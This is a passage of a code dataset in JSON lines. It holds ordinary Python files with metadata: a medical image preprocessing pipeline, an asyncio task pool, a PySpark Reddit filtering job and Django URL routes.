"gi.repository.Gtk.AttachOptions", "line_number": 112, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 112, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 113, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 113, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Image.new_from_stock", "line_number": 116, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Image", "line_number": 116, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 116, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.STOCK_STOP", "line_number": 116, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.IconSize", "line_number": 116, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.AttachOptions", "line_number": 121, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 121, "usage_type": "name"}, {"api_name": "gi.repository.GLib.idle_add", "line_number": 128, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 128, "usage_type": "name"}, {"api_name": "gi.repository.GObject.GObject", "line_number": 128, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 128, "usage_type": "name"}, {"api_name": "gi.repository.GObject.GObject", "line_number": 154, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 154, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 154, "usage_type": "name"}, {"api_name": "gi.repository.GObject.SIGNAL_RUN_FIRST", "line_number": 156, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 156, "usage_type": "name"}, {"api_name": "gi.repository.GObject.TYPE_NONE", "line_number": 156, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject.SIGNAL_RUN_FIRST", "line_number": 157, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 157, "usage_type": "name"}, {"api_name": "gi.repository.GObject.TYPE_NONE", "line_number": 157, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject.SIGNAL_RUN_FIRST", "line_number": 158, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 158, "usage_type": "name"}, {"api_name": "gi.repository.GObject.TYPE_NONE", "line_number": 158, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject.SIGNAL_RUN_FIRST", "line_number": 159, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 159, "usage_type": "name"}, {"api_name": "gi.repository.GObject.TYPE_NONE", "line_number": 159, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject.GObject.__init__", "line_number": 163, "usage_type": "call"}, {"api_name": "gi.repository.GObject.GObject", "line_number": 163, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 163, "usage_type": "name"}, {"api_name": "threading.Thread.__init__", "line_number": 164, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 164, "usage_type": "name"}, {"api_name": "gi.repository.GLib.idle_add", "line_number": 172, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 172, "usage_type": "name"}, {"api_name": "gi.repository.GObject.GObject", "line_number": 172, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 172, "usage_type": "name"}, {"api_name": "os.path.getsize", "line_number": 183, "usage_type": "call"}, {"api_name": "os.path", "line_number": 183, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path", "line_number": 193, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject.GObject", "line_number": 205, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 205, "usage_type": "name"}, {"api_name": "gi.repository.Nautilus.MenuProvider", "line_number": 205, "usage_type": "attribute"}, {"api_name": "gi.repository.Nautilus", "line_number": 205, "usage_type": "name"}, {"api_name": "mimetypes.init", "line_number": 216, "usage_type": "call"}, {"api_name": "urllib.unquote_plus", "line_number": 221, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "mimetypes.guess_type", "line_number": 224, "usage_type": "call"}, {"api_name": "gi.repository.Nautilus.MenuItem", "line_number": 249, "usage_type": "call"}, {"api_name": "gi.repository.Nautilus", "line_number": 249, "usage_type": "name"}, {"api_name": "gi.repository.Nautilus.Menu", "line_number": 253, "usage_type": "call"}, {"api_name": "gi.repository.Nautilus", "line_number": 253, "usage_type": "name"}, {"api_name": "gi.repository.Nautilus.MenuItem", "line_number": 256, "usage_type": "call"}, {"api_name": "gi.repository.Nautilus", "line_number": 256, "usage_type": "name"}, {"api_name": "gi.repository.Nautilus.MenuItem", "line_number": 269, "usage_type": "call"}, {"api_name": "gi.repository.Nautilus", "line_number": 269, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.AboutDialog", "line_number": 279, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 279, "usage_type": "name"}]} +{"seq_id": "34581872184", "text": "import json\nimport math\nimport os\nimport importlib\n\n\n# TODO make dynamic for load data\nfrom autoSeg.preprocessing.Transform import OtsuCrop, ResampleVxSpacing, ResampleVxSpacing_no_reference, N4BiasCorrection, Normalize, IntensityClipper\n\nimport SimpleITK as sitk\nfrom SimpleITK import N4BiasFieldCorrection, GetImageFromArray\nimport numpy as np\nfrom torchvision import transforms\nimport sys\n\n\nclass InitialPreprocessor(object):\n def __init__(self, INPUT_data_dir, config_file):\n self.INPUT_data_dir = INPUT_data_dir\n self.INTERMEDIATE_data_dir = os.path.join(sys.path[0], 'data', 'intermediate_data')\n self.PREPROCESSED_data_dir = os.path.join(sys.path[0], 'data', 'preprocessed_data')\n\n # Loading the json data from specified config file\n config_file = os.path.join(sys.path[0], 'autoSeg', 'config', config_file)\n with open(config_file, 'r') as config_json:\n config_json_data = json.load(config_json)\n self.config_file = config_json_data\n\n self.dataset_import = getattr(importlib.import_module('autoSeg.data_loading.{0:s}'.format(self.config_file['dataset'][0])), '{0:s}'.format(self.config_file['dataset'][1]))\n\n def run(self):\n # Getting settings from config file\n isotropic = self.config_file.get('isotropic')\n vx_spacing = self.config_file.get('vxspacing')\n spacingfactor = self.config_file.get('vxspacingfactor')\n\n # Load the inital base dataset and perform selected options\n print(' Loading initial dataset')\n dataset = self.load_data(self.INPUT_data_dir)\n\n dataset_origin_path = self.INTERMEDIATE_data_dir\n\n # Logging what transforms the intermediate dataset will have at the end\n dataset_state = {}\n dataset_state['biascorrection'] = self.config_file.get('biascorrection')\n dataset_state['resampling'] = self.config_file.get('resampling')\n dataset_state['isotropic'] = self.config_file.get('isotropic')\n dataset_state['vxspacing'] = self.config_file.get('vxspacing')\n\n # TODO zorgen dat croppen zonder resamplen kan\n # Check if there is a previous dataset\n print(' Checking for previously preprocessed datasets')\n json_check_path = os.path.join(self.INTERMEDIATE_data_dir, 'resampling.json')\n if os.path.isfile(json_check_path):\n # Below we define what to do when the intermediate dataset is already in a certain state\n # (e.g. biascoorection and no resampling)\n if not self.get_previous_config('biascorrection') and self.get_previous_config('resampling'):\n bc = self.config_file.get('biascorrection')\n res = self.config_file.get('resampling')\n if not bc and not res:\n dataset_origin_path = self.INPUT_data_dir\n elif bc and not res:\n dataset_origin_path = self.INPUT_data_dir\n elif not bc and res:\n if self.config_file.get('isotropic') == self.get_previous_config('isotropic') and \\\n self.config_file.get('vxspacing') == self.get_previous_config('vxspacing'):\n self.config_file['cropping'] = False\n self.config_file['resampling'] = False\n else:\n dataset_origin_path = self.INPUT_data_dir\n elif bc and res:\n self.config_file['cropping'] = False\n self.config_file['resampling'] = False\n\n elif self.get_previous_config('biascorrection') and not self.get_previous_config('resampling'):\n bc = self.config_file.get('biascorrection')\n res = self.config_file.get('resampling')\n if not bc and not res:\n dataset_origin_path = self.INPUT_data_dir\n elif bc and not res:\n self.config_file['biascorrection'] = False\n elif not bc and res:\n dataset_origin_path = self.INPUT_data_dir\n elif bc and res:\n self.config_file['biascorrection'] = False\n\n elif self.get_previous_config('biascorrection') and self.get_previous_config('resampling'):\n dataset_origin_path = self.INPUT_data_dir\n else:\n # In case no prev dataset exists we use the input dataset\n dataset_origin_path = self.INPUT_data_dir\n\n # If resampling is set to true in the config we perform resampling\n if self.config_file.get('resampling'):\n print(' Resampling dataset is needed')\n # Load the dataset and perform resampling on the voxel spacing\n ref_img, reference_center, dimension = self.__create_reference_domain(dataset,\n isotropic=isotropic,\n vx_spacing=vx_spacing,\n spacingfactor=spacingfactor)\n print(' Dataset will be resampled to shape:', ref_img.GetSize(), 'and spacing:', vx_spacing,\n 'with default value:', self.config_file.get('default_pixel_value'))\n if not self.config_file.get('resample_without_reference'):\n resample_obj = ResampleVxSpacing(ref_img, reference_center, dimension,\n default_pixel_value=self.config_file.get('default_pixel_value'))\n else:\n # Here, only isotropic spacing is possible\n resample_obj = ResampleVxSpacing_no_reference(spacingfactor=spacingfactor, default_pixel_value=self.config_file.get('default_pixel_value'))\n else:\n resample_obj = None\n self.config_file['cropping'] = False\n self.config_file['resampling'] = False\n\n transforms_list = self.get_transforms_list(resample_obj)\n print(' Needed transformations are:', transforms_list)\n # Here we cut the list of transformations in two to ensure that we do the bias correction and resampling first,\n # save it in the intermediate_data folder and then use it for further transformations\n if resample_obj in transforms_list:\n i = transforms_list.index(resample_obj)\n transforms_list1 = transforms_list[:i + 1]\n transforms_list2 = transforms_list[i + 1:]\n\n print(' Loading initial dataset for resampling')\n dataset_transf1 = self.load_data(dataset_origin_path, transforms_list1)\n print(' Saving resampled dataset:')\n self.save(dataset_transf1, self.INTERMEDIATE_data_dir)\n\n print(' Loading resampled dataset for further preprocessing')\n dataset_transf = self.load_data(self.INTERMEDIATE_data_dir, transforms_list2)\n print(' Saving fully preprocessed dataset:')\n self.save(dataset_transf, self.PREPROCESSED_data_dir)\n else:\n # If there is no resampling needed we dont slice the list\n print(' Loading older resampled dataset for further preprocessing')\n dataset_transf = self.load_data(self.INTERMEDIATE_data_dir, transforms_list)\n print(' Saving fully preprocessed dataset:')\n self.save(dataset_transf, self.PREPROCESSED_data_dir)\n\n # Here we store the executed resampling steps in a file that we can check in later uses.\n json_check_path = os.path.join(self.INTERMEDIATE_data_dir, 'resampling.json')\n with open(json_check_path, 'w') as outfile: # Use file to refer to the file object\n json.dump(dataset_state, outfile)\n\n # check whether the dataset is valid and can be used in the training procedure. ssp stands for\n # sizes, spacing and pooling\n is_valid_dataset, ssp = self.dataset_valid(dataset_transf)\n if is_valid_dataset:\n print(' Dataset valid for training')\n else:\n raise ValueError('Dataset is not valid for training. Sizes, spacing and pooling are:', ssp)\n\n def load_data(self, data_dir, transforms_list: list = None):\n if transforms_list is None:\n transforms_list = []\n transform = transforms.Compose(transforms_list)\n # data_set = eval(self.config_file['dataset'][1])(root_dir=data_dir, transform=transform)\n data_set = self.dataset_import(root_dir=data_dir, transform=transform)\n\n return data_set\n\n def get_transforms_list(self, resampleObj=None):\n transforms_list = []\n # If config says we need to do a transformation, we add this to the list\n transf_options_dict = {\n \"biascorrection\": N4BiasCorrection(),\n \"cropping\": OtsuCrop(),\n \"resampling\": resampleObj,\n \"intensityclipping\": IntensityClipper(self.config_file.get('intensityclippingvalues')[0],\n self.config_file.get('intensityclippingvalues')[1]),\n \"normalization\": Normalize(norm_method=self.config_file.get('normalizationmethod'),\n lir=self.config_file.get('lirHir')[0],\n hir=self.config_file.get('lirHir')[1],\n masked=self.config_file.get('masked'))\n\n }\n\n for transf_option in transf_options_dict:\n if self.config_file.get('{}'.format(transf_option)):\n transforms_list.append(transf_options_dict.get(transf_option))\n\n return transforms_list\n\n def save(self, dataset, OUTPUT_data_dir):\n for subject in dataset:\n name_img = subject.get('name_img')\n name_seg = subject.get('name_seg')\n img = subject.get('image')\n seg = subject.get('segmentation')\n\n # create path to store the images. The path has the same folder structure as initial dataset\n file_struct_img = name_img.split('_data')[1].split(os.sep)[:-1]\n file_struct_seg = name_seg.split('_data')[1].split(os.sep)[:-1]\n\n\n folder_path_img = os.path.join(OUTPUT_data_dir, *file_struct_img)\n folder_path_seg = os.path.join(OUTPUT_data_dir, *file_struct_seg)\n\n # Check if the path already exists. If not make the path\n print(' Saving to: ', folder_path_img, 'and', folder_path_seg)\n if not os.path.isdir(folder_path_img):\n os.makedirs(folder_path_img)\n if not os.path.isdir(folder_path_seg):\n os.makedirs(folder_path_seg)\n # check if images are already gzipped, if not do it anyways\n save_img_name = name_img.split(os.path.sep)[-1] + '.gz' if not '.gz' in name_img.split(os.path.sep)[-1] else name_img.split(os.path.sep)[-1]\n save_seg_name = name_seg.split(os.path.sep)[-1] + '.gz' if not '.gz' in name_seg.split(os.path.sep)[-1] else name_seg.split(os.path.sep)[-1]\n img_file_path = os.path.join(folder_path_img, save_img_name)\n seg_file_path = os.path.join(folder_path_seg, save_seg_name)\n sitk.WriteImage(img, str(img_file_path))\n sitk.WriteImage(seg, str(seg_file_path))\n\n def get_previous_config(self, param: str):\n prev_conf = False\n\n # construct path to file\n json_check_path = os.path.join(self.INTERMEDIATE_data_dir, 'resampling.json')\n\n # File might not exist, in that case we use the exception\n try:\n with open(json_check_path, 'r') as infile: # Use file to refer to the file object\n data = json.load(infile)\n prev_conf = data.get(param)\n except IOError:\n pass\n return prev_conf\n\n def dataset_valid(self, dataset):\n size_list = []\n vx_spacing_list = []\n\n for subject in dataset:\n img = subject.get('image')\n\n size_list.append(img.GetSize())\n vx_spacing_list.append(img.GetSpacing())\n\n # Since we do 4 max pooling operations with filtersize 2x2(x2) we need to get an amount of layers that is\n # divisible by 2x2x2x2=16\n same_sizes = size_list[:-1] == size_list[1:]\n same_spacing = vx_spacing_list[:-1] == vx_spacing_list[1:]\n # TODO get the pooling size from the training config file in order to determine if pooling is possible\n max_pooling_possible = None\n\n for (x, y, z) in size_list:\n if x % 16 == 0 and y % 16 == 0 and z % 16 == 0:\n max_pooling_possible = True\n else:\n max_pooling_possible = False\n break\n return same_sizes and same_spacing and max_pooling_possible, (same_sizes, same_spacing, max_pooling_possible)\n\n def adjust_reference_size(self, referene_size):\n adjusted_reference_size = []\n for x in referene_size:\n adjusted_reference_size.append(math.ceil(x / 16.0) * 16)\n return adjusted_reference_size\n\n def __create_reference_domain(self, dataset, isotropic: bool = True, vx_spacing: str = 'median',\n spacingfactor: int = 1):\n # In Lipo Data this will be 3D\n dimension = dataset[0].get('image').GetDimension()\n\n # Physical image size corresponds to the largest physical size in the training set, or any other arbitrary size.\n reference_physical_size = np.zeros(dimension)\n biggest_img_size = 0\n spacing_list = []\n sizes_list = []\n\n for index, subject in enumerate(dataset):\n img = subject.get('image')\n reference_physical_size[:] = [(sz - 1) * spc if sz * spc > mx else mx for sz, spc, mx in\n zip(img.GetSize(), img.GetSpacing(), reference_physical_size)]\n biggest_img_size = max(img.GetSize()) if max(img.GetSize()) > biggest_img_size else biggest_img_size\n spacing_list.append(img.GetSpacing())\n sizes_list.append(img.GetSize())\n\n # TODO sort for indiv tuple values, not tuples as a whole\n sizes_list.sort()\n # print('sizelist:', sizes_list)\n # print('spacing list:', spacing_list)\n spacing_list.sort()\n # print('spacing list ordered:', spacing_list)\n # print('median spacing: ', spacing_list[in t(len(spacing_list) / 2)])\n # Create the reference image with a zero origin, identity direction cosine matrix and dimension\n reference_origin = np.zeros(dimension)\n reference_direction = np.identity(dimension).flatten()\n\n # TODO change voxel spacing from smallest to mean\n # TODO implement 'smart spacing' option that minimizes overall distance to all points\n if isotropic:\n # The first possibility is that you want isotropic pixels, if so you can specify the image size for one of\n # the axes and the others are determined by this choice. Below we choose to set the x axis to the biggest\n # image size and the spacing accordingly.\n if vx_spacing == 'median':\n reference_spacing = [(spacing_list[int(len(spacing_list) / 2)][0])*spacingfactor] * dimension\n elif vx_spacing == 'mean':\n reference_spacing = list(map(lambda y: math.ceil(sum(y) / float(len(y))), zip(*spacing_list)))[0] * dimension\n elif vx_spacing == 'min':\n reference_spacing = [spacing_list[0][0]*spacingfactor] * dimension\n elif vx_spacing == 'max':\n reference_spacing = [spacing_list[-1][0]*spacingfactor] * dimension\n elif vx_spacing == 'one':\n reference_spacing = [1*spacingfactor] * dimension\n elif vx_spacing == 'development':\n print('prev spc', spacing_list[-1][0])\n multiplier = (1, 4, 4)\n reference_spacing = [tuple(i * j for i, j in zip(multiplier, spacing_list[-1][0]))] * dimension\n print('new spc', reference_spacing)\n else:\n # Just use the median spacing\n reference_spacing = [spacing_list[int(len(spacing_list) / 2)][0]] * dimension\n # print('ref spacing:', reference_spacing)\n reference_size = [int(phys_sz / (spc) + 1) for phys_sz, spc in\n zip(reference_physical_size, reference_spacing)]\n reference_size = self.adjust_reference_size(reference_size)\n # print(reference_size, reference_size_x)\n else:\n # Select arbitrary number of pixels per dimension, smallest size that yields desired results\n # or the required size of a pretrained network (e.g. VGG-16 224x224), transfer learning. This will\n # often result in non-isotropic pixel spacing. Here we have chosen to use the largest img size to\n # prevent loss of valuable information. Using this will make the image anisotropic. The effect\n # will most likely be seen in the 3rd dimension / over the slices.\n if vx_spacing == 'median':\n reference_spacing = spacing_list[int(len(spacing_list) / 2)]\n reference_size = [int(phys_sz / (spc) + 1) for phys_sz, spc in\n zip(reference_physical_size, reference_spacing)]\n reference_size = self.adjust_reference_size(reference_size)\n elif vx_spacing == 'mean':\n reference_spacing = list(map(lambda y: math.ceil(sum(y) / float(len(y))), zip(*spacing_list)))\n reference_size = [int(phys_sz / (spc) + 1) for phys_sz, spc in\n zip(reference_physical_size, reference_spacing)]\n reference_size = self.adjust_reference_size(reference_size)\n elif vx_spacing == 'min':\n reference_spacing = spacing_list[0]\n reference_size = [int(phys_sz / (spc) + 1) for phys_sz, spc in\n zip(reference_physical_size, reference_spacing)]\n reference_size = self.adjust_reference_size(reference_size)\n elif vx_spacing == 'max':\n reference_spacing = spacing_list[-1]\n reference_size = [int(phys_sz / (spc) + 1) for phys_sz, spc in\n zip(reference_physical_size, reference_spacing)]\n reference_size = self.adjust_reference_size(reference_size)\n elif vx_spacing == 'development':\n print('prev spc', spacing_list[-1])\n multiplier = (4, 4, 1)\n reference_spacing = tuple(i * j for i, j in zip(multiplier, spacing_list[-1]))\n print('new spc', reference_spacing)\n\n reference_size = [int(phys_sz / (spc) + 1) for phys_sz, spc in\n zip(reference_physical_size, reference_spacing)]\n reference_size = self.adjust_reference_size(reference_size)\n\n else:\n # Just use the median spacing\n reference_spacing = spacing_list[int(len(spacing_list) / 2)]\n reference_size = [int(phys_sz / (spc) + 1) for phys_sz, spc in\n zip(reference_physical_size, reference_spacing)]\n reference_size = self.adjust_reference_size(reference_size)\n\n print(' Reference spacing will be:', reference_spacing)\n print(' Reference size will be:', reference_size)\n\n reference_image = sitk.Image(reference_size, dataset[0].get('image').GetPixelIDValue())\n reference_image.SetOrigin(reference_origin)\n reference_image.SetSpacing(reference_spacing)\n reference_image.SetDirection(reference_direction)\n\n # Always use the TransformContinuousIndexToPhysicalPoint to compute an indexed point's physical coordinates as\n # this takes into account size, spacing and direction cosines. For the vast majority of images the direction\n # cosines are the identity matrix, but when this isn't the case simply multiplying the central index by the\n # spacing will not yield the correct coordinates resulting in a long debugging session.\n # TODO implement function that takes into account the direction cosine of all images.\n reference_center = np.array(\n reference_image.TransformContinuousIndexToPhysicalPoint(np.array(reference_image.GetSize()) / 2.0))\n\n return reference_image, reference_center, dimension\n", "repo_name": "koenyyy/ImageSegmentationMasterThesisJADS2019_2020Final", "sub_path": "pipeline_for_automated_segmentation_for_further_research/autoSeg/preprocessing/initial_preprocessing.py", "file_name": "initial_preprocessing.py", "file_ext": "py", "file_size_in_byte": 20567, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 26, "usage_type": "call"}, {"api_name": "importlib.import_module", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "autoSeg.preprocessing.Transform.ResampleVxSpacing", "line_number": 104, "usage_type": "call"}, {"api_name": "autoSeg.preprocessing.Transform.ResampleVxSpacing_no_reference", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 142, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 155, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 155, "usage_type": "name"}, {"api_name": "autoSeg.preprocessing.Transform.N4BiasCorrection", "line_number": 165, "usage_type": "call"}, {"api_name": "autoSeg.preprocessing.Transform.OtsuCrop", "line_number": 166, "usage_type": "call"}, {"api_name": "autoSeg.preprocessing.Transform.IntensityClipper", "line_number": 168, "usage_type": "call"}, {"api_name": "autoSeg.preprocessing.Transform.Normalize", "line_number": 170, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 191, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 192, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path", "line_number": 195, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 200, "usage_type": "call"}, {"api_name": "os.path", "line_number": 200, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path", "line_number": 202, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 207, "usage_type": "call"}, {"api_name": "os.path", "line_number": 207, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 208, "usage_type": "call"}, {"api_name": "os.path", "line_number": 208, "usage_type": "attribute"}, {"api_name": "SimpleITK.WriteImage", "line_number": 209, "usage_type": "call"}, {"api_name": "SimpleITK.WriteImage", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 221, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 286, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 297, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 329, "usage_type": "call"}, {"api_name": "SimpleITK.Image", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 373, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 374, "usage_type": "call"}]} +{"seq_id": "19115023235", "text": "import logging\nimport asyncio\nfrom asyncio.queues import Queue\n\nlog = logging.getLogger(__name__)\nTERMINATOR = object()\n\n\ndef periodic(loop, delay, fn, *args, **kwargs):\n\n async def _worker():\n while True:\n await fn(*args, **kwargs)\n await asyncio.sleep(delay, loop=loop)\n\n return asyncio.ensure_future(_worker(), loop=loop)\n\n\nclass TaskPool(object):\n def __init__(self, loop, num_workers):\n self.loop = loop\n self.tasks = Queue(loop=self.loop)\n self.workers = []\n for _ in range(num_workers):\n worker = asyncio.ensure_future(self.worker(), loop=self.loop)\n self.workers.append(worker)\n\n async def worker(self):\n while True:\n future, task = await self.tasks.get()\n if task is TERMINATOR:\n break\n try:\n result = await asyncio.wait_for(task, None, loop=self.loop)\n future.set_result(result)\n except Exception as e:\n log.exception(\"task raised exception\")\n future.set_exception(e)\n\n def submit(self, task):\n future = asyncio.Future(loop=self.loop)\n self.tasks.put_nowait((future, task))\n return future\n\n async def join(self):\n for _ in self.workers:\n self.tasks.put_nowait((None, TERMINATOR))\n await asyncio.gather(*self.workers, loop=self.loop)\n", "repo_name": "mdellavo/stream", "sub_path": "stream/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1412, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 14, "usage_type": "call"}, {"api_name": "asyncio.ensure_future", "line_number": 16, "usage_type": "call"}, {"api_name": "asyncio.queues.Queue", "line_number": 22, "usage_type": "call"}, {"api_name": "asyncio.ensure_future", "line_number": 25, "usage_type": "call"}, {"api_name": "asyncio.wait_for", "line_number": 34, "usage_type": "call"}, {"api_name": "asyncio.Future", "line_number": 41, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "27757390736", "text": "from pyspark import SparkConf, SparkContext\nimport sys\nimport json\nassert sys.version_info >= (3, 5) # make sure we have Python 3.5+\n\n# parse text to json object\ndef parse2json(line):\n return json.loads(line)\n\n# get only the fields subreddit, score, and author\ndef geInfo(line):\n yield (line[\"subreddit\"], line[\"score\"], line[\"author\"])\n\ndef main(inputs, output):\n # get only data from subreddits that contain an 'e' in their name\n text = sc.textFile(inputs).map(parse2json).flatMap(geInfo).filter(lambda x: 'e' in x[0])\n #text = sc.textFile(inputs).map(parse2json).flatMap(geInfo).filter(lambda x: 'e' in x[0]).cache()\n\n # and the rows with score greater than zero\n text.filter(lambda x: float(x[1]) > 0).map(json.dumps).saveAsTextFile(output + '/positive')\n\n # and the rows with score less than or equal to zero\n text.filter(lambda x: float(x[1]) <= 0).map(json.dumps).saveAsTextFile(output + '/negative')\n\nif __name__ == '__main__':\n conf = SparkConf().setAppName('reddit etl')\n sc = SparkContext(conf=conf)\n sc.setLogLevel('WARN')\n assert sc.version >= '2.4' # make sure we have Spark 2.4+\n inputs = sys.argv[1]\n output = sys.argv[2]\n main(inputs, output)\n", "repo_name": "chuc28/CMPT-732", "sub_path": "Assignment#4/reddit_elt.py", "file_name": "reddit_elt.py", "file_ext": "py", "file_size_in_byte": 1209, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.version_info", "line_number": 4, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 8, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 20, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pyspark.SparkConf", "line_number": 26, "usage_type": "call"}, {"api_name": "pyspark.SparkContext", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 31, "usage_type": "attribute"}]} +{"seq_id": "26730270727", "text": "from django.conf.urls import url\n\nfrom . import views\n\napp_name= 'accounts'\nurlpatterns = [\n url(r'^signup/$', views.SignUp.as_view(), name='signup'),\n url(r'^profile/$', views.ProfileView, name='profile'),\n url(r'^profile/(?P[a-zA-Z0-9_]+)$', views.ProfileViewOther, name='profile-other'),\n url(r'^profile/edit-profile/$', views.ProfileEdit, name='profile-edit'),\n url(r'^profile/add-post/$', views.addPost, name='add-post'),\n url(r'^profile/edit-profile/profile-pic-change/$', views.prfilepicchange, name='profile-pic'),\n url(r'^profile/(?P[a-zA-Z0-9]+)$', views.ProfileViewOther, name='profile-other'),\n #url(r'^profile/post/create/$', views.ProfilePostCreat, name='PostCreat'),\n #url(r'^profile/post/(?P\\d+)/update/$', views.ProfilePostUpdate, name='PostUpdate'),\n #url(r'^profile/post/(?P\\d+)/delete/$', views.ProfilePostDelete, name='PostDelete '),\n url(r'^profile/(?P[a-zA-Z0-9_]+)$', views.ProfileViewOther, name='profile-other'),\n url(r'^profile/(?P[a-zA-Z0-9_]+)/profile-pic-change/$', views.prfilepicchange, name='profile-pic')\n]\n", "repo_name": "amirmahdiKhosravi/GeeksNegar-Website", "sub_path": "accounts/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1125, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "7941817709", "text": "\"\"\"locallibrary URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n 